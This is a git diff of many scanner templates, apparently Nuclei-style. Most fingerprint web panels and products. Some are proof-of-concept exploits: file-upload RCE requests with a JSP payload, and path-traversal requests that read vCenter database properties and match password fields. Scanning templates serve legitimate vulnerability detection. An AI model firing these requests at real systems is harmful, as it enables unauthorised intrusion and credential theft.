------WebKitFormBoundary5Ur8laykKAWws2QO - Content-Disposition: form-data; name="file"; filename="Co5mos.xml" - Content-Type: image/png + --25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85 + Content-Disposition: form-data; name="Filedata"; filename="{{filename}}" - real path - ------WebKitFormBoundary5Ur8laykKAWws2QO - Content-Disposition: form-data; name="filename" + <% out.print(1111*2222);new java.io.File(application.getRealPath(request.getServletPath())).delete(); %> + --25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85-- - Co5mos.png - ------WebKitFormBoundary5Ur8laykKAWws2QO-- + --25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85 + Content-Disposition: form-data; name="Submit" + + --25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85-- - | GET /publishingImg/VIDEO/{{uploadfile}} HTTP/1.1 diff --git a/poc/upload/oa-v9-uploads-file-9190.yaml b/poc/upload/oa-v9-uploads-file-9190.yaml index fe7b89a11e..e0224cf506 100644 --- a/poc/upload/oa-v9-uploads-file-9190.yaml +++ b/poc/upload/oa-v9-uploads-file-9190.yaml @@ -1,11 +1,14 @@ id: oa-v9-uploads-file + info: name: OA V9 RCE via File Upload author: pikpikcu severity: high description: A vulnerability in OA V9 uploadOperation.jsp endpoint allows remote attackers to upload arbitrary files to the server. These files can be subsequently called and are executed by the remote software. - reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g + reference: + - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g tags: rce,jsp + requests: - raw: - | @@ -20,9 +23,11 @@ requests: <%out.print(2be8e556fee1a876f10fa086979b8c7c);%> ------WebKitFormBoundaryFy3iNVBftjP6IOwo-- + - | GET /page/exportImport/fileTransfer/poc.jsp HTTP/1.1 Host: {{Hostname}} + req-condition: true matchers: - type: dsl diff --git a/poc/upload/showdoc-file-upload-rce-10226.yaml b/poc/upload/showdoc-file-upload-rce-10226.yaml index b43708d1a6..574d070ebd 100644 --- a/poc/upload/showdoc-file-upload-rce-10226.yaml +++ b/poc/upload/showdoc-file-upload-rce-10226.yaml @@ -1,17 +1,12 @@ id: showdoc-file-upload-rce + info: - name: Showdoc <2.8.6 - Remote Code Execution + name: Showdoc < 2.8.6 File Upload RCE author: pikpikcu severity: critical - description: | - Showdoc versions before 2.8.6 is susceptible to remote code execution. - reference: - - https://github.com/star7th/showdoc/pull/1059 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 - tags: rce,fileupload,showdoc,oss,intrusive + reference: https://github.com/star7th/showdoc/pull/1059 + tags: rce,fileupload,showdoc + requests: - raw: - | @@ -25,20 +20,20 @@ requests: ----------------------------835846770881083140190633-- + matchers-condition: and matchers: - type: word - part: body words: - '"url":"http:' - '"success":1' condition: and + - type: status status: - 200 + extractors: - type: json json: - - '.url' - -# Enhanced by mp on 2022/05/30 + - '.url' \ No newline at end of file diff --git a/poc/upload/ueditor-file-upload-10876.yaml b/poc/upload/ueditor-file-upload-10876.yaml index 733c46e297..2d584faeef 100644 --- a/poc/upload/ueditor-file-upload-10876.yaml +++ b/poc/upload/ueditor-file-upload-10876.yaml @@ -3,12 +3,10 @@ info: name: UEditor Arbitrary File Upload author: princechaddha severity: high - description: A vulnerability in UEditor allows remote unauthenticated attackers to upload arbitrary files to the server, this in turn can be used to make the application to execute their content as code. - reference: + reference: | - https://zhuanlan.zhihu.com/p/85265552 - https://www.freebuf.com/vuls/181814.html tags: ueditor,fileupload - requests: - method: GET path: diff --git a/poc/upload/wp-upload-data-11604.yaml b/poc/upload/wp-upload-data-11604.yaml old mode 100644 new mode 100755 index 96634b10c2..4723898023 --- a/poc/upload/wp-upload-data-11604.yaml +++ b/poc/upload/wp-upload-data-11604.yaml @@ -1,24 +1,36 @@ id: wordpress-upload-data info: name: wordpress-upload-data - author: pussycat0x + author: + - l0ne1y + description: | + WordPress uploads 目录 data.txt 信息泄漏漏洞 + WordPress是Wordpress基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。 + 远程 WordPress 安装在“/wp-content/uploads/”文件夹下包含一个文件“data.txt”,其中包含敏感信息。 severity: medium - description: The remote WordPress installation contains a file 'data.txt' under the '/wp-content/uploads/' folder that has sensitive information inside it. - reference: https://www.exploit-db.com/ghdb/7040 - tags: wordpress,listing + remediation: |- + 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、发送敏感信息时需加密传输,如有必要需脱敏处理 + 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。 + 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口 + 令、会话标识jsessionid等), 防止敏感信息泄漏。 + 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓 + 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。 + 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/uploads/data.txt" - matchers-condition: and - matchers: - - type: word - words: - - "admin:" - - type: word - part: header - words: - - "text/plain" - - type: status - status: - - 200 +- matchers: + - type: word + words: + - 'admin:' + - type: word + part: header + words: + - text/plain + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/wp-content/uploads/data.txt' + method: GET diff --git a/poc/upload/zhiyuan-file-upload-11795.yaml b/poc/upload/zhiyuan-file-upload-11795.yaml index 88232d148c..ab775c14a1 100644 --- a/poc/upload/zhiyuan-file-upload-11795.yaml +++ b/poc/upload/zhiyuan-file-upload-11795.yaml @@ -1,29 +1,28 @@ id: zhiyuan-file-upload - info: - name: Zhiyuan OA arbitrary file upload vulnerability + name: Zhiyuan OA Arbitrary File Upload Vulnerability author: gy741 severity: critical - description: A vulnerability in Zhiyuan OA allows remote unauthenticated attackers to upload arbitrary files to the remote server which they can later access and cause their code to be executed. - reference: https://www.programmersought.com/article/92658169875/ - tags: zhiyuan,rce,upload - + description: A vulnerability in Zhiyuan OA allows remote unauthenticated attackers to upload arbitrary files to the remote server and cause execute arbitrary code to be executed. + reference: + - https://www.programmersought.com/article/92658169875/ + remediation: Apply the appropriate patch. + tags: zhiyuan,rce,upload,seeyon requests: - method: GET path: - "{{BaseURL}}/seeyon/thirdpartyController.do.css/..;/ajax.do" - matchers-condition: and matchers: - type: word words: - "java.lang.NullPointerException:null" - - type: word words: - "text/html" part: header - - type: status status: - 200 + +# Enhanced by mp on 2022/02/04 diff --git a/poc/vmware/vmware-vcenter-lfi-11047.yaml b/poc/vmware/vmware-vcenter-lfi-11047.yaml index fec7228ec4..53a04713d1 100644 --- a/poc/vmware/vmware-vcenter-lfi-11047.yaml +++ b/poc/vmware/vmware-vcenter-lfi-11047.yaml @@ -1,4 +1,5 @@ id: vmware-vcenter-lfi + info: name: VMware vCenter Unauthenticated Arbitrary File Read author: dwisiswant0 @@ -7,21 +8,25 @@ info: - https://kb.vmware.com/s/article/7960893 - https://twitter.com/ptswarm/status/1316016337550938122 tags: vmware,lfi,vcenter + requests: - raw: - | GET /eam/vib?id={{path}}\vcdb.properties HTTP/1.1 Host: {{Hostname}} + payloads: path: - - "C:\\ProgramData\\VMware\\VMware+VirtualCenter" # vCenter Server 5.5 and earlier (Windows 2008) - - "C:\\Documents+and+Settings\\All+Users\\Application+Data\\VMware\\VMware+VirtualCenter" # Other Windows versions - - "C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx" # vCenter Server => 6.0 + - "C:\\ProgramData\\VMware\\VMware+VirtualCenter" # vCenter Server 5.5 and earlier (Windows 2008) + - "C:\\Documents+and+Settings\\All+Users\\Application+Data\\VMware\\VMware+VirtualCenter" # Other Windows versions + - "C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx" # vCenter Server => 6.0 + matchers-condition: and matchers: - type: regex regex: - "(?m)^(driver|dbtype|password(\\.encrypted)?)\\s=" + - type: status status: - 200 diff --git a/poc/web/dixell-xweb500-filewrite-7018.yaml b/poc/web/dixell-xweb500-filewrite-7018.yaml index 4fe7c476db..5cfb5554ca 100644 --- a/poc/web/dixell-xweb500-filewrite-7018.yaml +++ b/poc/web/dixell-xweb500-filewrite-7018.yaml @@ -1,12 +1,15 @@ id: dixell-xweb500-filewrite + info: name: Dixell XWEB-500 - Arbitrary File Write author: hackerarpan severity: critical - reference: https://www.exploit-db.com/exploits/50639 + reference: + - https://www.exploit-db.com/exploits/50639 metadata: google-dork: inurl:"xweb500.cgi" tags: lfw,iot,dixell,xweb500 + requests: - raw: - | @@ -16,15 +19,18 @@ requests: {{randstr}}.txt dixell-xweb500-filewrite + - | GET /logo/{{randstr}}.txt HTTP/1.1 Host: {{Hostname}} + req-condition: true matchers-condition: and matchers: - type: dsl dsl: - 'contains(body_2, "dixell-xweb500-filewrite")' + - type: status status: - 200 diff --git a/poc/web/epson-web-control-detect-7241.yaml b/poc/web/epson-web-control-detect-7241.yaml index 42a41d65df..bcd2634d8d 100644 --- a/poc/web/epson-web-control-detect-7241.yaml +++ b/poc/web/epson-web-control-detect-7241.yaml @@ -1,4 +1,5 @@ id: epson-web-control-detect + info: name: Epson Printer author: pussycat0x @@ -9,10 +10,12 @@ info: classification: cwe-id: CWE-200 tags: iot,printer,panel,unauth,epson + requests: - method: GET path: - "{{BaseURL}}/cgi-bin/home" + matchers-condition: and matchers: - type: word @@ -21,6 +24,7 @@ requests: - "Basic Control" - "Advanced" condition: and + - type: status status: - 200 diff --git a/poc/web/fingerprinthub-web-fingerprints-7480.yaml b/poc/web/fingerprinthub-web-fingerprints-7480.yaml index ca2ef4cc89..e9c7fdd205 100644 --- a/poc/web/fingerprinthub-web-fingerprints-7480.yaml +++ b/poc/web/fingerprinthub-web-fingerprints-7480.yaml @@ -2,23 +2,21 @@ id: fingerprinthub-web-fingerprints info: name: FingerprintHub Technology Fingerprint - author: pdteam,righettod + author: pdteam severity: info description: FingerprintHub Technology Fingerprint tests run in nuclei. reference: - https://github.com/0x727/FingerprintHub classification: cwe-id: CWE-200 - metadata: - max-request: 1 tags: tech -http: +requests: - method: GET path: - "{{BaseURL}}" - host-redirects: true + redirects: true max-redirects: 2 matchers-condition: or @@ -717,16 +715,14 @@ http: - axis2-admin - axis2-web - - type: word - name: apache-druid - words: - - content="Apache Druid console" - - type: word part: header name: apache-cocoon + + - type: word + name: apache-druid words: - - "X-Cocoon-Version" + - content="Apache Druid console" - type: word name: apache-flink @@ -791,8 +787,11 @@ http: name: apache-kylin words: - + + - type: word + name: apache-kylin + words: - href="/kylin/" - condition: or - type: word name: apache-mesos @@ -841,13 +840,6 @@ http: words: - "Location: /solr/" - - type: word - part: header - name: apache-dubbo - words: - - 'Www-Authenticate: Basic realm="dubbo"' - case-insensitive: true - - type: word name: apache-struts words: @@ -887,7 +879,7 @@ http: part: header name: apilayer-caddy words: - - "Server: Caddy" + - "Server: caddy" - type: word name: appcms @@ -925,10 +917,10 @@ http: - 管理apusic应用服务器 - type: word - part: server + part: header name: apusic words: - - "Apusic Application Server" + - "Server: apusic application server" - type: word name: arab-portal @@ -1796,7 +1788,8 @@ http: - type: word name: cerberus-helpdesk words: - - + - - type: word name: symantec-endpoint-protection-manager words: - - symantec endpoint protection manager
web access
+ - symantec endpoint + protection manager
web access
- type: word name: symantec-thawte_ssl_cert @@ -12065,7 +12086,8 @@ http: - type: word name: synology-webstation words: - - id="paragraph">web station has been enabled. to finish setting up your website, please see the "web service + - id="paragraph">web station has been enabled. to finish setting up your website, + please see the "web service - type: word name: tab-and-link-manager @@ -12187,7 +12209,8 @@ http: - type: word name: telenor-4g-router words: - - please power off and plug in (u)sim card. then power on again. or pin is permanently blocked, please contact the provider + - please power off and plug in (u)sim card. then power on again. or pin is permanently + blocked, please contact the provider - type: word name: teleradiology-telrads @@ -12753,7 +12776,8 @@ http: - type: word name: turbo-seek words: - - var myspecs = "'menubar=0,status=1,resizable=1,location=0,titlebar=1,toolbar=1,scrollbars=1,width=" + mywidth + ",height=" + myheight + + - var myspecs = "'menubar=0,status=1,resizable=1,location=0,titlebar=1,toolbar=1,scrollbars=1,width=" + + mywidth + ",height=" + myheight + - type: word name: turbomail @@ -12839,13 +12863,6 @@ http: words: - welcome to nginx on ubuntu! - - type: word - name: openeuler - words: - - Test Page for the Apache HTTP Server on openEuler Linux - - Test Page for the Nginx HTTP Server on openEuler - condition: or - - type: word name: ucap-search- words: @@ -12931,7 +12948,8 @@ http: - type: word name: ultrastats words: - - + - - type: word name: uniform-server @@ -12946,7 +12964,8 @@ http: - type: word name: uniform-server words: - -

+ - - type: word name: unimas-cameraaudit @@ -12998,12 +13017,14 @@ http: - type: word name: useresponse words: - - + - title="customer feedback software, community support system" target="_blank" + href="http://www.useresponse.com" class="popup-logo"> - type: word name: useso @@ -13095,7 +13116,8 @@ http: - type: word name: vbulletin words: - - powered by < a href="https://www.vbulletin.com" id="vbulletinlink"> + - powered by < a href="https://www.vbulletin.com" + id="vbulletinlink"> - type: word name: vcalendar @@ -13584,7 +13606,8 @@ http: - type: word name: web-data-administrator words: - - shopping cart software' + - 'powered by webasyst shop-script shopping cart software' - type: word name: webbased-pear-package-manager @@ -13674,7 +13698,8 @@ http: - type: word name: webissues words: - -
+ -
- type: word name: weblogic @@ -13815,12 +13840,14 @@ http: - type: word name: whatweb words: - -
+ -
troy serial server
- type: word name: whatweb words: - - network card access password: + - network card access password: - type: word name: whfst-cms @@ -13860,7 +13887,8 @@ http: - type: word name: whmcs words: - -
please login or register
+ -
please login + or register
- type: word name: whtzjkj-erp @@ -14347,6 +14375,13 @@ http: words: - 神盾fs3文档安全共享系统v2.0 + - type: word + condition: and + name: yapi + words: + - YApi + - 可视化接口管理平台 + - type: word name: yearning words: @@ -14360,7 +14395,8 @@ http: - type: word name: yelala words: - - '' + - '' - type: word name: yfidea-oa @@ -14635,7 +14671,8 @@ http: - type: word name: yunanbao-yunxz words: - - 'id=mtokenplugin width=0 height=0 style="position: absolute;left: 0px; top: 0px"' + - 'id=mtokenplugin width=0 height=0 style="position: absolute;left: 0px; top: + 0px"' - type: word name: yuneasy-ipcalling @@ -14940,7 +14977,8 @@ http: - type: word name: zkteco-security-management-system words: - - $(".copyright").text("copyright ? " + server_current_year + " zkteco co., ltd. all rights reserved"); + - $(".copyright").text("copyright ? " + server_current_year + " zkteco co., ltd. + all rights reserved"); - type: word name: zkteco-system @@ -15018,7 +15056,8 @@ http: - type: word name: zxoa words: - - name="button1" value="" onclick="javascript:return checkfrom();" id="button1" class="loginbtn" /> + - name="button1" value="" onclick="javascript:return checkfrom();" id="button1" + class="loginbtn" /> - type: word name: zzcms @@ -15035,34 +15074,4 @@ http: words: - Powered by ZZZcms - - type: word - name: bitwarden - words: - - Bitwarden Web Vault - - - type: word - name: OpenBSD relayd - part: header - words: - - "Server: OpenBSD httpd" - - - type: word - name: Hunchentoot - part: header - words: - - "Server: Hunchentoot" - - - type: word - name: weblate - words: - - Weblate - - - condition: and - - - type: word - name: Adobe Experience Manager (AEM) - part: header - words: - - "x-dispatcher:" - case-insensitive: true -# digest: 4b0a00483046022100bc94744c796eb79eba218d1c041ec0e817654420bfc1a1c188d90dcfc8506dcc0221008763af93a66376ac9b4dbee14f6d8a1db56f84bfc29474faefd0f50ffd68ea6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# Enhanced by cs on 2022/02/08 diff --git a/poc/web/geovision-geowebserver-lfi-7597.yaml b/poc/web/geovision-geowebserver-lfi-7597.yaml index 8d17388031..6f8dc53b3e 100644 --- a/poc/web/geovision-geowebserver-lfi-7597.yaml +++ b/poc/web/geovision-geowebserver-lfi-7597.yaml @@ -1,15 +1,11 @@ id: geowebserver-lfi info: - name: GeoVision Geowebserver 5.3.3 - Local File Inclusion + name: GeoVision Geowebserver 5.3.3 - LFI author: madrobot severity: high - description: GeoVision Geowebserver 5.3.3 allows remote unauthenticated attackers to disclose the content of locally stored files via local file inclusion. + description: A vulnerability in GeoVision Geowebserver allows remote unauthenticated attackers to disclose the content of locally stored files. reference: - https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 tags: geowebserver,lfi requests: - method: GET @@ -28,5 +24,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/07/27 diff --git a/poc/web/git-web-interface-7713.yaml b/poc/web/git-web-interface-7713.yaml index c8e8b1510a..a0495968f2 100644 --- a/poc/web/git-web-interface-7713.yaml +++ b/poc/web/git-web-interface-7713.yaml @@ -1,24 +1,20 @@ id: git-web-interface - info: name: Git web interface author: dhiyaneshDK severity: low - tags: git metadata: - shodan-query: 'html:"git web interface version"' - + shodan-query: html:"git web interface version" + tags: git requests: - method: GET path: - '{{BaseURL}}' - matchers-condition: and matchers: - type: word words: - 'git web interface version' - - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/poc/web/hashicorp-consul-webgui-7897.yaml b/poc/web/hashicorp-consul-webgui-7897.yaml index b20663df2f..a157a7fed6 100644 --- a/poc/web/hashicorp-consul-webgui-7897.yaml +++ b/poc/web/hashicorp-consul-webgui-7897.yaml @@ -34,6 +34,4 @@ requests: part: body group: 1 regex: - - "(CONSUL_VERSION:.*[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})" - - + - "CONSUL_VERSION:.*([0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})" \ No newline at end of file diff --git a/poc/web/honeywell-web-controller-7996.yaml b/poc/web/honeywell-web-controller-7996.yaml new file mode 100644 index 0000000000..6ceea803db --- /dev/null +++ b/poc/web/honeywell-web-controller-7996.yaml @@ -0,0 +1,24 @@ +id: honeywell-web-controller + +info: + name: Honeywell XL Web Controller + author: dhiyaneshDK + severity: info + reference: + - https://www.exploit-db.com/ghdb/7130 + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}/standard/default.php' + + matchers-condition: and + matchers: + - type: word + words: + - 'Honeywell XL Web Controller' + + - type: status + status: + - 200 diff --git a/poc/web/ibm-websphere-ssrf-8126.yaml b/poc/web/ibm-websphere-ssrf-8126.yaml index df664b9910..f936c2af24 100644 --- a/poc/web/ibm-websphere-ssrf-8126.yaml +++ b/poc/web/ibm-websphere-ssrf-8126.yaml @@ -3,8 +3,7 @@ info: name: IBM WebSphere Portal SSRF author: pdteam severity: high - reference: - - https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/ + reference: https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/ tags: ibm,ssrf,websphere requests: - method: GET diff --git a/poc/web/icewarp-webclient-rce-8129.yaml b/poc/web/icewarp-webclient-rce-8129.yaml index 9d560da3c0..861af1af2a 100644 --- a/poc/web/icewarp-webclient-rce-8129.yaml +++ b/poc/web/icewarp-webclient-rce-8129.yaml @@ -1,10 +1,15 @@ id: icewarp-webclient-rce info: - name: IceWarp WebClient RCE + name: IceWarp WebClient - Remote Code Execution author: gy741 severity: critical + description: | + IceWarp WebClient is susceptible to remote code execution. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 tags: icewarp,rce - reference: https://www.pwnwiki.org/index.php?title=IceWarp_WebClient_basic_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E requests: - raw: - | @@ -16,9 +21,11 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - "Microsoft Windows [Version" - part: body - type: status status: - 302 + +# Enhanced by mp on 2022/05/30 diff --git a/poc/web/icinga-web-login-8137.yaml b/poc/web/icinga-web-login-8137.yaml index 0ef7258a86..b0383b79b2 100644 --- a/poc/web/icinga-web-login-8137.yaml +++ b/poc/web/icinga-web-login-8137.yaml @@ -4,7 +4,8 @@ info: name: Icinga Web 2 Login author: dhiyaneshDK severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Icinga+Web+2+Login%22 + reference: + - https://www.shodan.io/search?query=http.title%3A%22Icinga+Web+2+Login%22 tags: panel,icinga requests: diff --git a/poc/web/insecure-webview-content.yaml b/poc/web/insecure-webview-content.yaml new file mode 100644 index 0000000000..0a13953717 --- /dev/null +++ b/poc/web/insecure-webview-content.yaml @@ -0,0 +1,24 @@ +id: insecure-webview-content + +info: + name: Insecure WebView Content + author: YoruYagami + severity: high + description: | + This template detects the loading of insecure content in WebView, such as content from untrusted sources or local file URLs. Loading insecure content can expose the application to various security risks, including XSS attacks. + remediation: | + To remediate this issue, ensure that WebView only loads content from trusted sources and avoid loading local file URLs. Example: + + ```java + // Load content from trusted sources + webView.loadUrl("https://trusted.domain.com"); + ``` + +file: + - extensions: + - java + + matchers: + - type: word + words: + - "webView.loadUrl" diff --git a/poc/web/insecure-webview-ssl.yaml b/poc/web/insecure-webview-ssl.yaml new file mode 100644 index 0000000000..16fd2e03d0 --- /dev/null +++ b/poc/web/insecure-webview-ssl.yaml @@ -0,0 +1,28 @@ +id: insecure-webview-ssl + +info: + name: Insecure WebView SSL + author: YoruYagami + severity: high + description: | + This template detects insecure SSL handling in WebView by checking for methods like `setWebViewClient(new WebViewClient())` without proper SSL validation. Insecure SSL handling can expose the application to man-in-the-middle attacks. + remediation: | + Ensure that SSL errors are handled properly in WebView by implementing custom SSL validation. Example: + + ```java + webView.setWebViewClient(new WebViewClient() { + @Override + public void onReceivedSslError(WebView view, SslErrorHandler handler, SslError error) { + handler.cancel(); // Do not proceed with the insecure connection + } + }); + ``` + +file: + - extensions: + - all + + matchers: + - type: word + words: + - "setWebViewClient(new WebViewClient())" diff --git a/poc/web/iplanet-web-server-8191.yaml b/poc/web/iplanet-web-server-8191.yaml index 78c1d984a9..60f5c19673 100644 --- a/poc/web/iplanet-web-server-8191.yaml +++ b/poc/web/iplanet-web-server-8191.yaml @@ -3,9 +3,9 @@ info: name: Detect iPlanet Webserver Detection author: pussycat0x severity: info - metadata: - fofa-query: app="iPlanet-Web-Server,-Enterprise-Edition-4.1" tags: tech,webserver + metadata: + fofa-query: 'app="iPlanet-Web-Server,-Enterprise-Edition-4.1"' requests: - method: GET path: diff --git a/poc/web/microsoft-teams-webhook-8856.yaml b/poc/web/microsoft-teams-webhook-8856.yaml index 8e6497e83d..0c0bf6d78e 100644 --- a/poc/web/microsoft-teams-webhook-8856.yaml +++ b/poc/web/microsoft-teams-webhook-8856.yaml @@ -1,9 +1,11 @@ id: microsoft-teams-webhook + info: name: Microsoft Teams Webhook Disclosure author: Ice3man severity: info - tags: exposure,token + tags: exposure,token,microsoft + requests: - method: GET path: diff --git a/poc/web/microweber-detect-8862.yaml b/poc/web/microweber-detect-8862.yaml index 25c567062d..f3eecf3c3a 100644 --- a/poc/web/microweber-detect-8862.yaml +++ b/poc/web/microweber-detect-8862.yaml @@ -1,22 +1,27 @@ id: microweber-detect + info: name: Microweber Detect author: princechaddha severity: info - reference: https://github.com/microweber/microweber + reference: + - https://github.com/microweber/microweber metadata: - shodan-query: 'http.favicon.hash:780351152' + shodan-query: http.favicon.hash:780351152 tags: tech,microweber,oss + requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word part: body words: - '"generator" content="Microweber" />' + - type: status status: - 200 diff --git a/poc/web/opennms-web-console-9285.yaml b/poc/web/opennms-web-console-9285.yaml index 6fb6dbebb8..fe1158ada1 100644 --- a/poc/web/opennms-web-console-9285.yaml +++ b/poc/web/opennms-web-console-9285.yaml @@ -1,5 +1,4 @@ id: opennms-web-console - info: name: OpenNMS web console author: DhiyaneshDk @@ -7,19 +6,16 @@ info: reference: - https://www.exploit-db.com/ghdb/5468 tags: panel,login - requests: - method: GET path: - "{{BaseURL}}/opennms/login.jsp" - matchers-condition: and matchers: - type: word words: - "OpenNMS Web Console" part: body - - type: status status: - 200 diff --git a/poc/web/oracle-iplanet-web-server-9392.yaml b/poc/web/oracle-iplanet-web-server-9392.yaml index 8bd76eabb4..dcf6b13bc8 100644 --- a/poc/web/oracle-iplanet-web-server-9392.yaml +++ b/poc/web/oracle-iplanet-web-server-9392.yaml @@ -1,21 +1,26 @@ id: oracle-iplanet-web-server + info: name: Detect Oracle-iPlanet-Web-Server author: pussycat0x severity: info - metadata: - fofa-query: app="Oracle-iPlanet-Web-Server tags: tech,oracle + metadata: + fofa-query: 'app="Oracle-iPlanet-Web-Server' + requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word + part: body words: - "Oracle iPlanet Web Server" + - type: status status: - 200 diff --git a/poc/web/sap-netweaver-webgui-10059.yaml b/poc/web/sap-netweaver-webgui-10059.yaml index 270fb7fc0a..c9974f3576 100644 --- a/poc/web/sap-netweaver-webgui-10059.yaml +++ b/poc/web/sap-netweaver-webgui-10059.yaml @@ -1,17 +1,14 @@ id: sap-nw-webgui - info: name: SAP NetWeaver WebGUI Detection author: randomstr1ng severity: info description: Detection of SAP NetWeaver ABAP Webserver WebGUI tags: sap,webserver - requests: - method: GET path: - "{{BaseURL}}/sap/bc/gui/sap/its/webgui" - redirects: true max-redirects: 2 matchers: diff --git a/poc/web/sap-web-dispatcher-10076.yaml b/poc/web/sap-web-dispatcher-10076.yaml index df212cb10b..cf5e1ad308 100644 --- a/poc/web/sap-web-dispatcher-10076.yaml +++ b/poc/web/sap-web-dispatcher-10076.yaml @@ -2,17 +2,18 @@ id: sap-web-dispatcher-detection info: name: SAP Web Dispatcher detection author: randomstr1ng - severity: info description: Detection of SAP Web Dispatcher service + severity: info tags: sap,webserver,proxy requests: - method: GET redirects: true - max-redirects: 2 + max-redirects: 5 path: - "{{BaseURL}}/inormalydonotexist" + matchers-condition: or matchers: - - type: word + - type: regex part: body - words: - - "This error page was generated by SAP Web Dispatcher" + regex: + - "SAP Web Dispatcher" diff --git a/poc/web/spark-webui-unauth-10400.yaml b/poc/web/spark-webui-unauth-10400.yaml index a917ae6951..6ca1120cb0 100644 --- a/poc/web/spark-webui-unauth-10400.yaml +++ b/poc/web/spark-webui-unauth-10400.yaml @@ -1,14 +1,18 @@ id: spark-webui-unauth + info: name: Unauthenticated Spark WebUI author: princechaddha severity: medium - reference: https://github.com/vulhub/vulhub/tree/master/spark/unacc + reference: + - https://github.com/vulhub/vulhub/tree/master/spark/unacc tags: spark,unauth + requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: status diff --git a/poc/web/total-web-10814.yaml b/poc/web/total-web-10814.yaml index ecb0e56ec6..aa370ea472 100644 --- a/poc/web/total-web-10814.yaml +++ b/poc/web/total-web-10814.yaml @@ -1,4 +1,5 @@ id: total-web-login + info: name: Total Web Solution author: dhiyaneshDK @@ -6,10 +7,12 @@ info: reference: - https://www.exploit-db.com/ghdb/6811 tags: panel + requests: - method: GET path: - '{{BaseURL}}' + matchers-condition: and matchers: - type: word diff --git a/poc/web/web-service-panel-11165.yaml b/poc/web/web-service-panel-11165.yaml index 9a30df6abd..5926a07a6f 100644 --- a/poc/web/web-service-panel-11165.yaml +++ b/poc/web/web-service-panel-11165.yaml @@ -3,7 +3,8 @@ info: name: WEB SERVICE Panel author: dhiyaneshDK severity: info - reference: https://www.exploit-db.com/ghdb/7116 + reference: + - https://www.exploit-db.com/ghdb/7116 tags: panel,service requests: - method: GET diff --git a/poc/web/web-suite-detect-11167.yaml b/poc/web/web-suite-detect-11167.yaml index 33bf8280f2..51ea564b42 100644 --- a/poc/web/web-suite-detect-11167.yaml +++ b/poc/web/web-suite-detect-11167.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: info metadata: - fofa-query: "Web Suite 2021 Login" + fofa-query: Web Suite 2021 Login tags: tech,web-suite requests: diff --git a/poc/web/weblogic-detect-11142.yaml b/poc/web/weblogic-detect-11142.yaml index d50d670388..34fc69e440 100644 --- a/poc/web/weblogic-detect-11142.yaml +++ b/poc/web/weblogic-detect-11142.yaml @@ -1,13 +1,26 @@ id: weblogic-detect + info: name: Detect Weblogic - author: bing0o + author: pdteam severity: info + metadata: + shodan-query: product:"Oracle Weblogic" + tags: tech,weblogic + requests: - method: GET path: - - "{{BaseURL}}/console/login/LoginForm.jsp" + - "{{BaseURL}}/{{randstr}}" + + matchers-condition: and matchers: - type: word words: - - "WebLogic" + - "From RFC 2068" + - "Error 404--Not Found" + condition: and + + - type: status + status: + - 404 diff --git a/poc/web/weblogic-login-11149.yaml b/poc/web/weblogic-login-11149.yaml index 39a4fb59f8..443214f57e 100644 --- a/poc/web/weblogic-login-11149.yaml +++ b/poc/web/weblogic-login-11149.yaml @@ -1,28 +1,23 @@ id: weblogic-login - info: name: Weblogic Login Panel author: bing0o,meme-lord severity: info - tags: panel,oracle,weblogic,login metadata: shodan-query: product:"Oracle Weblogic" - + tags: panel,oracle,weblogic,login requests: - method: GET path: - "{{BaseURL}}/console/login/LoginForm.jsp" - matchers-condition: and matchers: - type: word words: - "WebLogic" - - type: status status: - 200 - extractors: - type: regex group: 1 diff --git a/poc/web/weblogic-t3-detect-11151.yaml b/poc/web/weblogic-t3-detect-11151.yaml index b1a63e30be..fd503f75f3 100644 --- a/poc/web/weblogic-t3-detect-11151.yaml +++ b/poc/web/weblogic-t3-detect-11151.yaml @@ -1,7 +1,7 @@ id: weblogic-t3-detect info: name: Detect Weblogic T3 Protocol - author: F1tz + author: F1tz,milo2012,wdahlenb severity: info description: Check T3 protocol status. tags: network,weblogic @@ -15,3 +15,24 @@ network: - type: word words: - "HELO" + extractors: + - type: regex + part: 